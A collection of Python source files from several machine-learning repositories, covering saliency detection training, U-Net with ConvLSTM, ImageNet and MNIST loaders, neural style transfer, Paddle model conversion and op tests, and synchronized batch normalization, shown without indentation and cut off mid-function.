ori_data = [i.cuda() for i in ori_data]
'''~~~Our DSU Framework~~~'''
# RGB Stream
'''Attentive Training Strategy'''
atts_rgb,dets_rgb,_= model_rgb(images)
pred_sal = dets_rgb.detach()
# The update interval τ is 3, amounting to 2τ = 6 epochs in a training round.
if (epoch + 1) % 6 <= 3 and (epoch + 1) % 6 > 0: # Step One
loss_rgb1 = CE(atts_rgb, gts)
loss_rgb2 = CE(dets_rgb, gts)
loss_rgb = (loss_rgb1 + loss_rgb2) / 2.0
else: # Step Two
weight, _ = loss_weight(dets_rgb, gts)
Weighted_CE = torch.nn.BCEWithLogitsLoss(weight=weight)
loss_rgb1 = Weighted_CE(atts_rgb, gts)
loss_rgb2 = Weighted_CE(dets_rgb, gts)
loss_rgb = (loss_rgb1 + loss_rgb2) / 2.0
loss_rgb.backward()
clip_gradient(optimizer_rgb, opt.clip)
optimizer_rgb.step()
# Depth Stream
atts_depth,dets_depth,feature = model_depth(images)
loss_depth1 = MSE(atts_depth, depths)
loss_depth2 = MSE(dets_depth, depths)
loss_depth = (loss_depth1 + loss_depth2) / 2.0
loss_depth.backward()
clip_gradient(optimizer_depth, opt.clip)
optimizer_depth.step()
# Fusion stream
old_feature = feature.detach()
S_dep, Non_S_dep, new_feature, depth_pos, depth_neg, pred_depth = model(pred_sal,depths,old_feature)
loss_Sal_depth = MSE(S_dep,depth_pos)
loss_NonSal_depth = MSE(Non_S_dep,depth_neg)
loss_depth_new = MSE(pred_depth,depths)
loss_consistency = Distance(old_feature,new_feature)/50
loss = (loss_Sal_depth + loss_NonSal_depth + loss_depth_new + loss_consistency)/4.0
loss.backward()
clip_gradient(optimizer, opt.clip)
optimizer.step()
if (epoch + 1) % 6 == 0:
'''Update pseudo Label'''
# Note that: we need to obtain original data with no augmentation to replace the fake label
with torch.no_grad():
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
img_ori,gt_ori,depth_ori = ori_data
_, det_rgb, _ = model_rgb(img_ori)
pred_saliency = det_rgb.detach()
_, _, feature1 = model_depth(img_ori)
old_feature1 = feature1.detach()
S_dep1, Non_S_dep1, _, _, _, _ = model(pred_saliency, depth_ori, old_feature1)
S_depth1 = S_dep1.detach()
Non_S_depth1 = Non_S_dep1.detach()
_, l_weight = loss_weight(pred_saliency, gt_ori)
update_pseudoLabel(l_weight,ppath,S_depth1,Non_S_depth1,pred_saliency,int(epoch+1))
'''~~~END~~~'''
if i % 400 == 0 or i == total_step:
print('{} Epoch [{:03d}/{:03d}], Step [{:04d}/{:04d}], Loss_rgb: {:.4f} Loss_depth_sal: {:0.4f}'.
format(datetime.now(), epoch, opt.epoch, i, total_step, loss_rgb.data, loss.data))
writer.add_scalar('Loss/rgb', loss_rgb.item(), iteration)
writer.add_scalar('Loss/depth', loss_depth.item(), iteration)
writer.add_scalar('Loss/Sal_depth', loss.item(), iteration)
save_path = 'ckpt/'
if not os.path.exists(save_path):
os.makedirs(save_path)
if (epoch+1) % 2 == 0:
torch.save(model_rgb.state_dict(), save_path + 'DSU_rgb.pth' + '.%d' % (epoch+1))
torch.save(model_depth.state_dict(), save_path + 'DSU_depth.pth' + '.%d' % (epoch + 1))
torch.save(model.state_dict(), save_path + 'DSU.pth' + '.%d' % (epoch + 1))
print("Let's go!")
for epoch in range(1, opt.epoch):
adjust_lr(optimizer_rgb, opt.lr, epoch, opt.decay_rate, opt.decay_epoch)
adjust_lr(optimizer_depth, opt.lr, epoch, opt.decay_rate, opt.decay_epoch)
adjust_lr(optimizer, opt.lr, epoch, opt.decay_rate, opt.decay_epoch)
train(train_loader, model_rgb, model_depth, model,
optimizer_rgb, optimizer_depth,optimizer, epoch)
if (epoch+1) % 2 == 0:
ckpt_name = '.' + str(epoch+1)
eval_data(val_root, validation,ckpt_name)
if epoch >= opt.epoch -1:
writer.close()
```
#### File: DSU_Code/model/Sal_CNN.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
import numpy as np
import scipy.stats as st
import matplotlib.pyplot as plt
class BasicConv2d(nn.Module):
def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, dilation=1):
super(BasicConv2d, self).__init__()
self.conv = nn.Conv2d(in_planes, out_planes,
kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False)
self.bn = nn.BatchNorm2d(out_planes)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
return x
def gkern(kernlen=16, nsig=3):
interval = (2*nsig+1.)/kernlen
x = np.linspace(-nsig-interval/2., nsig+interval/2., kernlen+1)
kern1d = np.diff(st.norm.cdf(x))
kernel_raw = np.sqrt(np.outer(kern1d, kern1d))
kernel = kernel_raw/kernel_raw.sum()
return kernel
def min_max_norm(in_):
max_ = in_.max(3)[0].max(2)[0].unsqueeze(2).unsqueeze(3).expand_as(in_)
min_ = in_.min(3)[0].min(2)[0].unsqueeze(2).unsqueeze(3).expand_as(in_)
in_ = in_ - min_
return in_.div(max_-min_+1e-8)
class HA(nn.Module):
# holistic attention module
def __init__(self):
super(HA, self).__init__()
gaussian_kernel = np.float32(gkern(31, 4))
gaussian_kernel = gaussian_kernel[np.newaxis, np.newaxis, ...]
self.gaussian_kernel = Parameter(torch.from_numpy(gaussian_kernel))
def forward(self, attention, x):
soft_attention = F.conv2d(attention, self.gaussian_kernel, padding=15)
soft_attention = min_max_norm(soft_attention)
Soft_Att= soft_attention.max(attention)
zero = torch.zeros_like(Soft_Att)
one = torch.ones_like(Soft_Att)
Soft_Att = torch.tensor(torch.where(Soft_Att > 0.05, one, Soft_Att))
Soft_Att = torch.tensor(torch.where(Soft_Att <=0.05, zero, Soft_Att))
Depth_pos = torch.mul(x, Soft_Att)
Depth_neg = torch.mul(x, 1- Soft_Att)
return Depth_pos, Depth_neg
class Sal_CNN(nn.Module):
def __init__(self):
super(Sal_CNN, self).__init__()
in_channel = 32*3
out_channel = 1
self.Sal_Dep1= nn.Sequential(
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
)
self.pred1 = nn.Conv2d(in_channel, out_channel, kernel_size=1, padding=0)
self.NonSal_Dep1 = nn.Sequential(
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
)
self.pred2 = nn.Conv2d(in_channel, out_channel, kernel_size=1, padding=0)
self.pred3 = nn.Conv2d(in_channel, out_channel, kernel_size=1, padding=0)
self.HA = HA()
self._init_weight()
def _init_weight(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
torch.nn.init.kaiming_normal_(m.weight)
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def forward(self,pred_sal,depths,feature):
'''Generating the disentangled depth masks'''
depth_pos, depth_neg = self.HA(pred_sal.sigmoid(),depths)
'''Disentangle Depth'''
# Saliency-guided Depth
x1 = self.Sal_Dep1(feature)
S_dep = self.pred1(x1)
# Non_Saliency Depth
x2 = self.NonSal_Dep1(feature)
Non_S_dep = self.pred2(x2)
new_feature = x1 + x2
pred_depth = self.pred3(new_feature)
return S_dep, Non_S_dep, new_feature, depth_pos, depth_neg,pred_depth
``` |
{
"source": "jiwei0921/JSM",
"score": 2
} |
#### File: model/0VGG/CPD_models.py
```python
import torch
import torch.nn as nn
from model.vgg import B2_VGG
class aggregation(nn.Module):
def __init__(self, channel):
super(aggregation, self).__init__()
self.relu = nn.ReLU(True)
self.upsample = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)
self.conv_x1 = nn.Conv2d(channel*8, channel, 3, padding=1)
self.conv_x2 = nn.Conv2d(channel*8, channel, 3, padding=1)
self.conv_x3 = nn.Conv2d(channel*4, channel, 3, padding=1)
self.conv_upsample1 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample2 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample3 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample4 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample5 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_concat2 = nn.Conv2d(2*channel, channel, 3, padding=1)
self.conv_concat3 = nn.Conv2d(2*channel, channel, 3, padding=1)
self.conv4 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv5 = nn.Conv2d(channel, 1, 1)
for m in self.modules():
if isinstance(m, nn.Conv2d):
m.weight.data.normal_(std=0.01)
m.bias.data.fill_(0)
def forward(self, x1, x2, x3):
# x1: 1/16 x2: 1/8 x3: 1/4
x1_1 = self.conv_x1(x1)
x2_1 = self.conv_x2(x2)
x3_1 = self.conv_x3(x3)
x2_2 = torch.cat((x2_1, self.conv_upsample4(self.upsample(x1_1))), 1)
x2_2 = self.conv_concat2(x2_2)
x3_2 = torch.cat((x3_1, self.conv_upsample5(self.upsample(x2_2))), 1)
x3_2 = self.conv_concat3(x3_2)
x = self.conv4(x3_2)
fea = x
x = self.conv5(x)
return x, fea
class CPD_VGG(nn.Module):
def __init__(self, channel=64):
super(CPD_VGG, self).__init__()
self.vgg = B2_VGG()
self.agg1 = aggregation(channel)
self.upsample = nn.Upsample(scale_factor=4, mode='bilinear', align_corners=False)
def forward(self, x):
x1 = self.vgg.conv1(x)
x2 = self.vgg.conv2(x1)
x3 = self.vgg.conv3(x2)
x3_1 = x3
x4_1 = self.vgg.conv4_1(x3_1)
x5_1 = self.vgg.conv5_1(x4_1)
detection, feature = self.agg1(x5_1, x4_1, x3_1)
return self.upsample(detection), self.upsample(feature)
``` |
{
"source": "jiwei0921/MRNet",
"score": 2
} |
#### File: models/Unet/unet_model.py
```python
from .unet_parts import *
from torch import nn
import torch
from .res_net import resnet34, resnet18, resnet50, resnet101, resnet152
import torch.nn.functional as F
from torch.autograd import Variable
class SaveFeatures():
features = None
def __init__(self, m): self.hook = m.register_forward_hook(self.hook_fn)
def hook_fn(self, module, input, output): self.features = output
def remove(self): self.hook.remove()
class UnetBlock(nn.Module):
def __init__(self, up_in, x_in, n_out):
super().__init__()
# super(UnetBlock, self).__init__()
up_out = x_out = n_out // 2
self.x_conv = nn.Conv2d(x_in, x_out, 1)
self.tr_conv = nn.ConvTranspose2d(up_in, up_out, 2, stride=2)
self.bn = nn.BatchNorm2d(n_out)
def forward(self, up_p, x_p):
up_p = self.tr_conv(up_p)
x_p = self.x_conv(x_p)
cat_p = torch.cat([up_p, x_p], dim=1)
return self.bn(F.relu(cat_p))
class UNet(nn.Module):
def __init__(self, resnet='resnet34', num_classes=2, pretrained=False):
super().__init__()
# super(ResUnet, self).__init__()
cut, lr_cut = [8, 6]
if resnet == 'resnet34':
base_model = resnet34
elif resnet == 'resnet18':
base_model = resnet18
elif resnet == 'resnet50':
base_model = resnet50
elif resnet == 'resnet101':
base_model = resnet101()
elif resnet == 'resnet152':
base_model = resnet152
else:
raise Exception('The Resnet Model only accept resnet18, resnet34, resnet50,'
'resnet101 and resnet152')
layers = list(base_model(pretrained=pretrained).children())[:cut]
base_layers = nn.Sequential(*layers)
self.rn = base_layers
self.num_classes = num_classes
self.sfs = [SaveFeatures(base_layers[i]) for i in [2, 4, 5, 6]]
self.up1 = UnetBlock(512, 256, 256)
self.up2 = UnetBlock(256, 128, 256)
self.up3 = UnetBlock(256, 64, 256)
self.up4 = UnetBlock(256, 64, 256)
self.up5 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)
'''~~~ self definition ~~~'''
self.up_c1 = nn.ConvTranspose2d(6, 6, 4, stride=2)
self.up_c2 = nn.ConvTranspose2d(6, 512, 2, stride=2)
self.conv = nn.Conv2d(6,512,3,padding=1)
self.CONVLSTMcell = ConvLSTMCell(512, 512)
def forward(self, x, condition):
x = F.relu(self.rn(x)) # x = [b_size, 2048, 8, 8]
'''~~~ 1: Condition + feature ==> ConvLSTM ~~~'''
condition = condition.unsqueeze(-1).unsqueeze(-1).expand(-1,-1,8,8)
condition = self.conv(condition)
# condition = self.up_c2(self.up_c1(condition.unsqueeze(-1).unsqueeze(-1))) # x = [b_size, 512, 8, 8]
for t in range(0, 1): # step =1
state = self.CONVLSTMcell(x, [condition, condition])
x = state[0]
'''~~~ 1: ENDs ~~~'''
'''~~~ 0: Decoder ~~~'''
x = self.up1(x, self.sfs[3].features)
x = self.up2(x, self.sfs[2].features)
x = self.up3(x, self.sfs[1].features)
x = self.up4(x, self.sfs[0].features)
fea = x
output = self.up5(x)
'''~~~ 0: ENDs ~~~'''
'''
if self.num_classes==1:
output = x_out[:, 0]
else:
output = x_out[:, :self.num_classes]
'''
return output, fea
def close(self):
for sf in self.sfs: sf.remove()
class ConvLSTMCell(nn.Module):
"""
Generate a convolutional LSTM cell
"""
def __init__(self, input_size, hidden_size):
super(ConvLSTMCell, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.Gates = nn.Conv2d(input_size + hidden_size, 4 * hidden_size, 3, padding=1)
def forward(self, input_, prev_state):
# get batch and spatial sizes
batch_size = input_.data.size()[0]
spatial_size = input_.data.size()[2:]
# generate empty prev_state, if None is provided
if prev_state is None:
state_size = [batch_size, self.hidden_size] + list(spatial_size)
prev_state = (
Variable(torch.zeros(state_size)),
Variable(torch.zeros(state_size))
)
prev_hidden, prev_cell = prev_state
# data size is [batch, channel, height, width]
stacked_inputs = torch.cat((input_, prev_hidden), 1)
gates = self.Gates(stacked_inputs)
# chunk across channel dimension
in_gate, remember_gate, out_gate, cell_gate = gates.chunk(4, 1)
# apply sigmoid non linearity
in_gate = torch.sigmoid(in_gate)
remember_gate = torch.sigmoid(remember_gate)
out_gate = torch.sigmoid(out_gate)
# apply tanh non linearity
cell_gate = torch.tanh(cell_gate)
# compute current cell and hidden state
cell = (remember_gate * prev_cell) + (in_gate * cell_gate)
hidden = out_gate * torch.tanh(cell)
return hidden, cell
```
#### File: utils/utils2/ActivationFun.py
```python
import numpy as np
def softmax(x, axis=-1):
e_x = np.exp(x - np.max(x, axis=axis, keepdims=True))
return e_x / np.sum(e_x, axis=axis, keepdims=True)
def sigmoid(x):
return 1 / (1 + np.exp(-x))
```
#### File: utils/utils2/ComputeNetParameters.py
```python
import numpy as np
def computerNetParameters(net):
params = list(net.parameters())
k = 0
for index, i in enumerate(params):
l = 1
print(index+1, "layer structure:" + str(list(i.size())))
for j in i.size():
l *= j
print("layer paramenters: " +str(l))
k += l
print("network paramenters: " +str(k))
return k
``` |
{
"source": "jiweibo/ImageNet",
"score": 2
} |
#### File: jiweibo/ImageNet/data_loader.py
```python
import os
import torch
import torchvision.transforms as transforms
import torchvision.datasets as datasets
def data_loader(root, batch_size=256, workers=1, pin_memory=True):
traindir = os.path.join(root, 'ILSVRC2012_img_train')
valdir = os.path.join(root, 'ILSVRC2012_img_val')
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
train_dataset = datasets.ImageFolder(
traindir,
transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize
])
)
val_dataset = datasets.ImageFolder(
valdir,
transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize
])
)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=workers,
pin_memory=pin_memory,
sampler=None
)
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=batch_size,
shuffle=False,
num_workers=workers,
pin_memory=pin_memory
)
return train_loader, val_loader
``` |
{
"source": "jiweibo/MNIST_Recognition",
"score": 3
} |
#### File: jiweibo/MNIST_Recognition/mnist.py
```python
from __future__ import print_function
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from torchvision import datasets, transforms
import numpy as np
import time
import matplotlib.pyplot as plt
# settings
DATA_DIR = '../../repository/data/mnist'
enable_cuda = True
# hyper parameters
batch_size = 64
num_epoches = 10
learning_rate = 1e-3
# datasets
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))
])
train_loader = torch.utils.data.DataLoader(
datasets.MNIST(DATA_DIR, train=True, download=True, transform=transform),
batch_size=batch_size,
shuffle=True
)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST(DATA_DIR, train=False, download=False, transform=transform),
batch_size=batch_size,
shuffle=False
)
class Net(nn.Module):
def __init__(self, cuda):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 16, kernel_size=5, stride=1)
self.conv2 = nn.Conv2d(16, 64, kernel_size=5, stride=1)
self.max_pool = nn.MaxPool2d(kernel_size=2, stride=2)
self.dropout = nn.Dropout(0.5)
self.fc1 = nn.Linear(4096, 84)
self.fc2 = nn.Linear(84, 10)
self.relu = nn.ReLU()
self.softmax = nn.Softmax()
self.use_cuda = cuda
def forward(self, x):
x = self.relu(self.max_pool(self.conv1(x))) # 12 * 12 * 16
x = self.relu(self.conv2(x)) # 8 * 8 *64
x = x.view(-1, 64 * 64) # flatten
x = self.dropout(self.relu(self.fc1(x))) # size * 84
x = self.fc2(x) # size * 10
return F.log_softmax(x)
def evaluate(model, X):
model.eval()
if model.use_cuda:
X = torch.from_numpy(X.astype(np.float32)).cuda()
else:
X = torch.from_numpy(X.astype(np.float32))
X = Variable(X)
output = model(X)
output = F.softmax(output)
pred = output.data.max(dim=1)[1]
if model.use_cuda:
output, pred = output.cpu(), pred.cpu()
c = list(range(0, 10))
output = list(output.data.numpy().squeeze())
dic = dict(zip(c, output))
pred = pred.numpy().squeeze()
return dic, pred
def build_model(enable_cuda):
model = Net(enable_cuda)
if model.use_cuda:
model = model.cuda()
if os.path.exists('mnist_params.pkl'):
model.load_state_dict(torch.load('mnist_params.pkl'))
optimizer = optim.Adam(model.parameters(), learning_rate, betas=(0.9, 0.999))
return model, optimizer
def train(model, optimizer, train_loader, num_epoches):
start_time = time.time()
model.train()
for epoch in range(num_epoches):
for (batch_index, (data, target)) in enumerate(train_loader):
correct = 0
if model.use_cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
pred = output.data.max(dim=1)[1]
correct += pred.eq(target.data).cpu().sum()
if batch_index % 200 == 0:
print('Train Epoch: {} [{} / {}]\tLoss: {:.6f}\tAccuracy: {:.4f}'.format(
epoch,
batch_index * len(data),
len(train_loader.dataset),
loss.data[0],
correct / target.size()[0]
))
torch.save(model.state_dict(), 'mnist_params.pkl')
print('Time: ', time.time() - start_time)
def model_eval(model, test_loader):
model.eval()
test_loss = 0
correct = 0
error_data = []
error_rlabel = []
error_flabel = []
for data, target in test_loader:
if model.use_cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
output = model(data)
test_loss += F.nll_loss(output, target).data[0]
pred = output.data.max(dim=1)[1]
correct += pred.eq(target.data).cpu().sum()
# Error Analysis
error_idx = 1 - pred.eq(target.data).cpu().numpy()
if np.sum(error_idx) > 0:
error_data.append(data.data.cpu().numpy()[error_idx == 1])
error_flabel.append(pred.cpu().numpy()[error_idx == 1])
error_rlabel.append(target.data.cpu().numpy()[error_idx == 1])
show_samples(error_data, error_rlabel, error_flabel)
test_loss /= len(test_loader)
print('\nTest set: Average loss : {:.4f}, Accuracy: {}/{} ({:.4f}%)\n'.format(
test_loss,
correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)
))
def show_samples(data, label, pred):
fig, axes = plt.subplots(figsize=(28, 28), nrows=6, ncols=6)
for ax, img, lb, pr in zip(axes.flatten(), data, label, pred):
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
ax.imshow(img[0].reshape(28, 28), cmap='gray')
ax.set_title('true: {}---pred: {}'.format(lb[0], pr[0]))
plt.savefig('error_classification.jpg')
plt.show()
if __name__ == "__main__":
model, optimizer = build_model(enable_cuda)
# train(model, optimizer, train_loader, num_epoches)
model_eval(model, test_loader)
``` |
{
"source": "jiweibo/Neural-Style-Transfer",
"score": 3
} |
#### File: jiweibo/Neural-Style-Transfer/main.py
```python
from __future__ import print_function
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.optim as optim
from PIL import Image
import matplotlib.pyplot as plt
import torchvision.transforms as transforms
import torchvision.models as models
import copy
import os
# whether cuda is available
use_cuda = torch.cuda.is_available()
dtype = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
# load, resize, totensor
imsize_h = 512
imsize_w = 512
# imsize = 512 if use_cuda else 128
loader = transforms.Compose([
transforms.Scale((imsize_w, imsize_h)),
transforms.ToTensor()
])
def image_loader(image_name):
"""convert an image to a variable tensor"""
image = Image.open(image_name)
image = Variable(loader(image))
image = image.unsqueeze(0)
return image
# load image to variable tensor
output_img_path = 'images/output/'
style_img_path = 'images/style/'
content_img_path = 'images/content/'
style_img_name = 'the_shipwreck_of_the_minotaur.jpg'
content_img_name = 'Dipping-Sun.jpg'
style_img = image_loader(style_img_path + style_img_name).type(dtype)
content_img = image_loader(content_img_path + content_img_name).type(dtype)
assert style_img.size() == content_img.size(), \
"we need to import style and content images of the same size, but style size is ({}), " \
"content size is *({})".format(style_img.size(), content_img.size())
# convert a tensor to a PILImage
unloader = transforms.ToPILImage()
def imshow(tensor, title=None):
"""show image"""
image = tensor.clone().cpu()
image = image.view(3, imsize_w, imsize_h)
image = unloader(image)
plt.imshow(image)
if title is not None:
plt.title(title)
plt.pause(0.001) # pause a bit so that plots are updated
class ContentLoss(nn.Module):
"""Content Loss"""
def __init__(self, target, weight):
super(ContentLoss, self).__init__()
self.target = target.detach() * weight
self.weight = weight
self.criterion = nn.MSELoss()
def forward(self, input):
self.loss = self.criterion(input * self.weight, self.target)
self.output = input
return self.output
def backward(self, retain_graph=True):
self.loss.backward(retain_graph=retain_graph)
return self.loss
class GramMatrix(nn.Module):
def forward(self, input):
a, b, c, d = input.size()
features = input.view(a * b, c * d)
G = torch.mm(features, features.t())
return G.div(a * b * c * d)
class StyleLoss(nn.Module):
def __init__(self, target, weight):
super(StyleLoss, self).__init__()
self.target = target.detach() * weight
self.weight = weight
self.gram = GramMatrix()
self.criterion = nn.MSELoss()
def forward(self, input):
self.output = input.clone()
self.G = self.gram(input)
self.G.mul_(self.weight)
self.loss = self.criterion(self.G, self.target)
return self.output
def backward(self, retain_graph=True):
self.loss.backward(retain_graph=retain_graph)
return self.loss
# load model
cnn = models.vgg19(pretrained=True).features
if use_cuda:
cnn = cnn.cuda()
content_layers_default = ['conv_4']
style_layers_dafault = ['conv_1', 'conv_2', 'conv_3', 'conv_4', 'conv_5']
def get_style_model_and_losses(cnn, style_img, content_img,
style_weight=1000, content_weight=1,
content_layers=content_layers_default,
style_layers=style_layers_dafault):
cnn = copy.deepcopy(cnn)
content_losses = []
style_losses = []
model = nn.Sequential()
gram = GramMatrix()
if use_cuda:
model = model.cuda()
gram = gram.cuda()
i = 1
for layer in list(cnn):
if isinstance(layer, nn.Conv2d):
name = 'conv_' + str(i)
model.add_module(name, layer)
if name in content_layers:
target = model(content_img).clone()
content_loss = ContentLoss(target, content_weight)
model.add_module('content_loss' + str(i), content_loss)
content_losses.append(content_loss)
if name in style_layers:
target_feature = model(style_img).clone()
target_feature_gram = gram(target_feature)
style_loss = StyleLoss(target_feature_gram, style_weight)
model.add_module('style_loss' + str(i), style_loss)
style_losses.append(style_loss)
if isinstance(layer, nn.ReLU):
name = 'relu_' + str(i)
model.add_module(name, layer)
if name in content_layers:
target = model(content_img).clone()
content_loss = ContentLoss(target, content_weight)
model.add_module('content_loss' + str(i), content_loss)
content_losses.append(content_loss)
if name in style_layers:
target_feature = model(style_img).clone()
target_feature_gram = gram(target_feature)
style_loss = StyleLoss(target_feature_gram, style_weight)
model.add_module('style_loss' + str(i), style_loss)
style_losses.append(style_loss)
i += 1
if isinstance(layer, nn.MaxPool2d):
name = 'pool_' + str(i)
model.add_module(name, layer)
return model, style_losses, content_losses
# input_img = content_img.clone()
input_img = Variable(torch.randn(content_img.data.size())).type(dtype)
def get_input_param_optimizer(input_img):
input_param = nn.Parameter(input_img.data)
# optimizer = optim.LBFGS([input_param])
optimizer = optim.Adam([input_param])
return input_param, optimizer
def run_style_transfer(cnn, content_img, style_img, input_img, num_steps=500,
style_weight=1000, content_weight=1):
print('Building the style transfer model..')
model, style_losses, content_losses = get_style_model_and_losses(cnn,
style_img, content_img, style_weight,
content_weight)
input_param, optimizer = get_input_param_optimizer(input_img)
print('Optimizing..')
run = [0]
while run[0] <= num_steps:
def closure():
input_param.data.clamp_(0, 1)
optimizer.zero_grad()
model(input_param)
style_score = 0
content_score = 0
for sl in style_losses:
style_score += sl.backward()
for cl in content_losses:
content_score += cl.backward()
run[0] += 1
if run[0] % 50 == 0:
print('run {}:'.format(run))
print('Style Loss : {:4f} Content Loss : {:4f}'.format(
style_score.data[0], content_score.data[0]
))
print()
return style_score + content_score
optimizer.step(closure)
input_param.data.clamp_(0, 1)
return input_param.data
output = run_style_transfer(cnn, content_img, style_img, input_img)
def savefig(img_tensor, path='./images/output/', name=os.path.splitext(style_img_name)[0] + content_img_name):
img = img_tensor.cpu()
img = img.view(3, imsize_h, imsize_w)
img = unloader(img)
img.save(path + name)
savefig(output)
# model, style_losses, content_losses = get_style_model_and_losses(cnn, style_img, content_img)
# print(str(model))
``` |
{
"source": "jiweibo/Scripts",
"score": 2
} |
#### File: Scripts/paddle/convert_models.py
```python
import paddle.fluid as fluid
import numpy as np
import argparse
def parse_args():
parser = argparse.ArgumentParser(description='paddle convert inference models.')
parser.add_argument("dirname", type=str, help="source model dir")
parser.add_argument("model_filename", type=str, help="model filename")
parser.add_argument("params_filename", type=str, help="params filename")
parser.add_argument("save_dir", type=str, help="target model dir")
args = parser.parse_args()
return args, parser
def convert():
exe = fluid.Executor(fluid.CPUPlace())
[inference_program, feed_target_names, fetch_targets] = fluid.io.load_inference_model(dirname=args.dirname, executor=exe, model_filename=args.model_filename, params_filename=args.params_filename)
with fluid.program_guard(inference_program):
fluid.io.save_inference_model(args.save_dir, feeded_var_names=feed_target_names, target_vars=fetch_targets, executor=exe)
if __name__ == '__main__':
args, parser = parse_args()
convert()
```
#### File: paddle/op/fluid_activation.py
```python
import paddle
import argparse
import numpy as np
import paddle.fluid as fluid
def parse_args():
parser = argparse.ArgumentParser(description='paddle activation op test')
parser.add_argument("op", type=str, choices=['leaky_relu'], help="activation op in 'leaky_relu', default is 'leaky_relu'", default='leaky_relu')
args = parser.parse_args()
return args, parser
def main():
x = fluid.layers.data(name='x', shape=[2], dtype='float32', lod_level=1)
result = fluid.layers.leaky_relu(x, alpha=0.1)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
x_i = np.array([[-1, 2], [3, -4]]).astype(np.float32)
x_d = fluid.create_lod_tensor(x_i, [[1, 1]], fluid.CPUPlace())
result_value, = exe.run(fluid.default_main_program(), feed={'x':x_d}, fetch_list=[result], return_numpy=False)
#print(type(result_value))
print(result_value)
if __name__ == '__main__':
args, parser = parse_args()
#parser.print_help()
main()
```
#### File: paddle/op/fluid_compare.py
```python
import paddle
import argparse
import numpy as np
import paddle.fluid as fluid
def parse_args():
parser = argparse.ArgumentParser(description='paddle compare op test')
parser.add_argument("op", type=str, choices=['less_than', 'less_equal'], help="compare op in 'less_than', 'less_equal', default is 'less_than'", default='less_than')
args = parser.parse_args()
return args, parser
def main():
x = fluid.layers.data(name='x', shape=[2], dtype='float64', lod_level=1)
y = fluid.layers.data(name='y', shape=[2], dtype='float64', lod_level=1)
# ref = fluid.layers.fill_constant(shape=[2], dtype='float64', value=0)
result = fluid.layers.less_than(x=x, y=y, force_cpu=False)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
x_i = np.array([[1, 2], [3, 4]]).astype(np.float64)
y_i = np.array([[2, 2], [1, 3]]).astype(np.float64)
x_d = fluid.create_lod_tensor(x_i, [[1,1]], place)
y_d = fluid.create_lod_tensor(y_i, [[1,1]], place)
result_value, = exe.run(fluid.default_main_program(), feed={'x':x_d, 'y':y_d}, fetch_list=[result], return_numpy=False)
#print(type(result_value))
print(result_value)
print(np.array(result_value))
#print(ref_value)
if __name__ == '__main__':
args, parser = parse_args()
#parser.print_help()
main()
``` |
{
"source": "JiweiMaster/jde",
"score": 2
} |
#### File: jde/utils/syncbn.py
```python
import math
from queue import Queue
from IPython import embed
import torch
import torch.cuda.comm as comm
from torch.nn.modules.batchnorm import _BatchNorm
import torch.nn.functional as F
import syncbn_gpu
class SyncBNFucntion(torch.autograd.Function):
@staticmethod
def forward(ctx, x, gamma, beta, running_mean, running_var,
extra, training=True, momentum=0.1, eps=1e-5, sync=True):
def parse_extra(ctx, extra):
ctx.is_master = extra["is_master"]
if ctx.is_master:
ctx.master_queue = extra["master_queue"]
ctx.worker_queues = extra["worker_queues"]
ctx.worker_ids = extra["worker_ids"]
else:
ctx.master_queue = extra["master_queue"]
ctx.worker_queue = extra["worker_queue"]
parse_extra(ctx, extra)
ctx.training = training
ctx.momentum = momentum
ctx.eps = eps
ctx.sync = sync
if ctx.training:
ex, exs = syncbn_gpu.batch_norm_collect_statistics(x)
if ctx.sync:
if ctx.is_master:
ex, exs = [ex.unsqueeze(0)], [exs.unsqueeze(0)]
